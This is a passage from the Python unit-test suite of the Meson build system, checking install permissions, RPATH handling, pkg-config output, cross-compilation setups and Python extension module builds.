found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
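# Each tuple below is a pairwise ordering constraint: the first flag must
# appear before the second one on the same linker line.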
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
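# While building, the binaries carry the build_rpath entries ($ORIGIN-relative
# plus /foo/bar); on install Meson rewrites the RPATH so that only the
# install_rpath value from the build definition remains.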
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertNotIn(b'libpkgdep-int', pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertNotIn(b'glib', pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
Check that a static library installed together with its Meson-generated
pkg-config file can be consumed by another project via PKG_CONFIG_PATH.
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_secondary_dependencies(self):
'''
Check that Meson gets -Wl,-rpath-link right for secondary dependencies
This test requires at least two libraries, as -Wl,-rpath-link is only
required for dependencies of dependencies (i.e. secondary dependencies).
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 rpath-link secondary')
# build libA
testdirlibA = os.path.join(testdirbase, 'libA')
testlibAprefix = os.path.join(tempdirname, 'libAprefix')
self.init(testdirlibA, extra_args=['--prefix=' + testlibAprefix,
'--libdir=lib',
'--default-library=shared'], default_args=False)
self.build()
self.install(use_destdir=False)
# build libB (uses libA)
pkg_dir = [os.path.join(testlibAprefix, 'lib/pkgconfig')]
self.new_builddir()
testdirlibB = os.path.join(testdirbase, 'libB')
testlibBprefix = os.path.join(tempdirname, 'libBprefix')
self.init(testdirlibB, extra_args=['--prefix=' + testlibBprefix,
'--libdir=lib',
'--default-library=shared'], default_args=False,
override_envvars={'PKG_CONFIG_PATH': ':'.join(pkg_dir)})
self.build()
self.install(use_destdir=False)
# build executable (uses libB, secondary dependency on libA)
pkg_dir.append(os.path.join(testlibBprefix, 'lib/pkgconfig'))
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': ':'.join(pkg_dir)})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '68 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On these platforms, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertLess(deps.index(b'-lsomething'), deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
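# In build.ninja '$$' is the escape for a literal '$', so this pattern matches
# the $ORIGIN-relative rpath entries for the two subprojects in order.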
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
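# LIBRARY_PATH is honoured by the compiler driver when searching for
# libraries, letting cc.find_library() locate the freshly installed library
# without extra -L flags; PKG_CONFIG_PATH exposes its generated .pc file.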
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
curdir = os.getcwd()
os.chdir(subdir)
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
os.chdir(curdir)
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
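# gmodule-2.0 pulls in -Wl,--export-dynamic via pkg-config and the test
# project presumably adds it again; after deduplication it must appear at
# most once per link line.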
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that the library occurs only once on any line that links it,
# i.e. the compiler libraries were deduplicated (splitting on the lib
# yields exactly two parts).
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
crossfile = tempfile.NamedTemporaryFile(mode='w')
env = {'CC': '"' + os.path.join(testdir, 'build_wrapper.py') + '"'}
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '69 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '69 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.fail('Option libdir not in introspect data.')
def test_std_remains(self):
# The c_std defined in the project options must also be in effect when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name (python2 / python3), the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine; if it is
# not, or the python headers can't be found, the test raises
# MESON_SKIP_TEST. We could check beforehand which python versions are
# available, but that is the module's job (a chicken-and-egg problem),
# so we just ask for forgiveness rather than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
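# The rewriter writes log output to stdout and its JSON result to stderr,
# which is why stderr is parsed below.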
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
